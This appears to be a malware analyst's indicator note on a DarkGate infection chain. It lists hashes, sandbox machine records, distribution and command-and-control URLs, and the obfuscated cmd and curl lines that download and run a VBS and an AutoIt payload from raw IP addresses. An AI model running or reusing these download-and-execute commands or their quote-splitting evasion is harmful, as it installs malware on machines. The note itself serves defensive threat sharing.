01.10.2023 | Darkgate | 

*************************************************

.url https://yellowstone.com.mm/rahu/
.zip dc7e093daf79662126d4abeb759551a92a87ac73baa63e55e185c7eeaacd6347 pw = 678
.zip 2fc402ad7b53ff4a9ca527ec8f188c28fb9f42dfe171b77439c46b1912cdf18a pw = 678
.vbs 1d7053102899df457b96b56671ac70ab69817bc1e97b96d42634a772d0d65995

*************************************************

>> Tracker database block
   Machine ID:  desktop-ZSbDJhDI
   MAC Address: 83:6f:08:00:27:2f
   MAC Vendor:  (Unknown vendor)
   Creation:    3104-12-18 03:06:24

>> Tracker database block
   Machine ID:  desktop-dzVhgpj
   MAC Address: 08:00:27:2f:f3:76
   MAC Vendor:  PCS SYSTEMTECHNIK
   Creation:    2022-04-07 19:40:18

>> Tracker database block
   Machine ID:  desktop-uoKuXtg
   MAC Address: 08:00:27:2f:f3:76
   MAC Vendor:  PCS SYSTEMTECHNIK
   Creation:    2022-04-07 19:40:18

*************************************************

zip > lnk > vbs > au3 > exe

cmd /c C:\Users\Admin\AppData\Local\Temp\MFGT.pdf.lnk

cmd.exe /c fjw || eChO fjw & PI"Ng" fjw || CuR"l" h"t"tp"://"136".2"4"4"."9"2."148"/r"dFR"2/Gb"B" -o C:\Users\Admin\AppData\Local\Temp\fjw.vbs & PI"Ng" -n 4 fjw || c"sc"r"I"P"t" C:\Users\Admin\AppData\Local\Temp\fjw.vbs & ex"i"T 'JHtjiktvgJhgaZg

PI"Ng" fjw 

CuR"l" h"t"tp"://"136".2"4"4"."9"2."148"/r"dFR"2/Gb"B" -o C:\Users\Admin\AppData\Local\Temp\fjw.vbs

PI"Ng" -n 4 fjw 

WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fjw.vbs"

cmd.exe" /c mkdir c:\rqdp & cd /d c:\rqdp & copy c:\windows\system32\curl.exe rqdp.exe & rqdp -H "User-Agent: curl" -o Autoit3.exe http://81.19.135.17:2351 & rqdp -o nvptjf.au3 http://81.19.135.17:2351/msirqdppgyg & Autoit3.exe nvptjf.au3

rqdp -H "User-Agent: curl" -o Autoit3.exe http://81.19.135.17:2351 

rqdp  -o nvptjf.au3 http://81.19.135.17:2351/msirqdppgyg 

Autoit3.exe  nvptjf.au3 

*************************************************

distro urls

http://95.179.164.94/fep4R/Jm
http://136.244.92.148/rdFR2/GbB
http://95.179.241.172/uque/Neh

*************************************************

c2'

http://81.19.135.17:2351/rqdppgyg
http://81.19.135.17:2351/msirqdppgyg
http://81.19.135.17:2351/
